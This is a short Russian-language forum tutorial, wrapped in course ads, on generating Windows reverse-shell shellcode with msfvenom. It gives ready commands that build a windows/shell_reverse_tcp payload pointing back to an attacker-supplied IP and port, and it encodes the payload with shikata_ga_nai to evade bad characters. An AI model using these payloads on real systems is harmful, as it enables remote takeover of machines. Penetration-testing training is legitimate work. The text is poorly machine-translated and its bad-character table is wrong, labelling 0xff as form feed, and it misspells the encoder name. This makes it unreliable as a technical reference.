• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Гостевая статья Создание кода Shellcode с помощью msfvenom

  • Автор темы Автор темы Vlad
  • Дата начала Дата начала
Создание кода Shellcode с помощью msfvenom.png



Msfvenom - это комбинация msfpayload и msfencode, помещающая оба эти инструмента в один экземпляр Framework.

Что такое shellcode?

При взломе shellcode - это небольшой фрагмент кода, используемый в качестве полезной нагрузки при использовании программной уязвимости. Он называется "shellcode", поскольку обычно запускает командную оболочку, из которой злоумышленник может управлять скомпрометированной машиной, но любой фрагмент кода, выполняющий аналогичную задачу, можно назвать shellcode.

Вы можете написать свой собственный shellcode и вы можете использовать некоторые инструменты, чтобы создать их для вас, msfvenom является одним из таких инструментов, с помощью которого вы можете создать shellcode.

Команда:
[B]msfvenom -h[/B]

В данном учебном пособии мы выбрали windows/shell_reverse_tcp полезной нагрузки для создания шелл-кода оболочки,

Команда:
Код:
msfvenom -p windows/shell_reverse_tcp LHOST= yourip LPORT=listeningport -f c

Вы увидите, что ваш шелл-код генерируется msfvenom, следующим шагом будет удаление плохих символов, так что наш шелл-код выполняется так, как мы хотим, плохие символы являются простыми символами, которые в основном завершают наш код, прежде чем он будет полностью исполнен.

Распространенные недопустимые символы:
0x00 ПУСТОЙ УКАЗАТЕЛЬ (\0)
0x09 Вкладка (\t)
0x0a Канал линии (\n)
0x0d Возврат каретки (\r)
0xff Канал формы (\f)

Чтобы удалить неправильные символы, мы должны кодировать их с помощью какого-то кодировщика, в этом учебном пособии мы использовали shikata_gai_nai кодировщик.

Команда:
Код:
msfvenom -p windows/shell_reverse_tcp LHOST=yourip LPORT=listeningport -f c  -e x86/shikata_ga_nai -b “\x00”


Руководство
—————
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

Курс AD